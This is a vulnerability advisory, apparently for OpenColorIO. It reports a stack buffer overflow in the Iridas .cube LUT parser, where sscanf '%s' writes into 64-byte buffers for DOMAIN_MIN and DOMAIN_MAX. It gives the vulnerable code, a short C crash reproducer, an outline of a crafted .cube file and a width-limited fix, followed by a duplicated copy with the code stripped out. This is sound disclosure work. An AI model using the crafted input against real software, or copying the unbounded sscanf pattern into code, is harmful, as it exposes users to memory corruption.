Summary
FileFormatIridasCube.cpp uses sscanf with %s into 64-byte stack buffers without width limits when parsing DOMAIN_MIN and DOMAIN_MAX lines. On non-Windows platforms, a crafted .cube file overflows these buffers. The input comes from std::string with no length cap.
Details
Lines 244-246 (non-Windows path):
char domainMinR[64] = "";
char domainMinG[64] = "";
char domainMinB[64] = "";
if (sscanf(line.c_str(), "domain_min %s %s %s %c", domainMinR, domainMinG, domainMinB, &endTok) != 3)
Same pattern at lines 278-280 for DOMAIN_MAX. line is a std::string read from the file with no length limit. A token longer than 63 bytes overflows the stack buffer.
The Windows path uses sscanf_s with size parameters and is not affected.
PoC
#include <stdio.h>
#include <string.h>
int main(void) {
char domainMinR[64] = "";
char domainMinG[64] = "";
char domainMinB[64] = "";
char endTok;
char line[4096];
snprintf(line, sizeof(line), "domain_min %s 0.0 0.0",
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
sscanf(line, "domain_min %s %s %s %c", domainMinR, domainMinG, domainMinB, &endTok);
return 0;
}
// gcc -fsanitize=address -g -o poc poc.c && ./poc
// Expected: stack-buffer-overflow WRITE into domainMinR[64]
Crafted .cube file:
TITLE "crash"
DOMAIN_MIN AAAA...200chars... 0.0 0.0
DOMAIN_MAX 1.0 1.0 1.0
LUT_3D_SIZE 2
0.0 0.0 0.0
0.0 0.0 1.0
0.0 1.0 0.0
0.0 1.0 1.0
1.0 0.0 0.0
1.0 0.0 1.0
1.0 1.0 0.0
1.0 1.0 1.0
Impact
Stack buffer overflow when parsing a crafted .cube file on non-Windows. Attacker-controlled data on the stack. Reachable through any OCIO API or tool that loads .cube LUTs.
Suggested fix
if (sscanf(line.c_str(), "domain_min %63s %63s %63s %c", domainMinR, domainMinG, domainMinB, &endTok) != 3)
Same for DOMAIN_MAX block.
Summary
FileFormatIridasCube.cppusessscanfwith%sinto 64-byte stack buffers without width limits when parsingDOMAIN_MINandDOMAIN_MAXlines. On non-Windows platforms, a crafted .cube file overflows these buffers. The input comes fromstd::stringwith no length cap.Details
Lines 244-246 (non-Windows path):
Same pattern at lines 278-280 for
DOMAIN_MAX.lineis astd::stringread from the file with no length limit. A token longer than 63 bytes overflows the stack buffer.The Windows path uses
sscanf_swith size parameters and is not affected.PoC
Crafted .cube file:
Impact
Stack buffer overflow when parsing a crafted .cube file on non-Windows. Attacker-controlled data on the stack. Reachable through any OCIO API or tool that loads .cube LUTs.
Suggested fix
Same for DOMAIN_MAX block.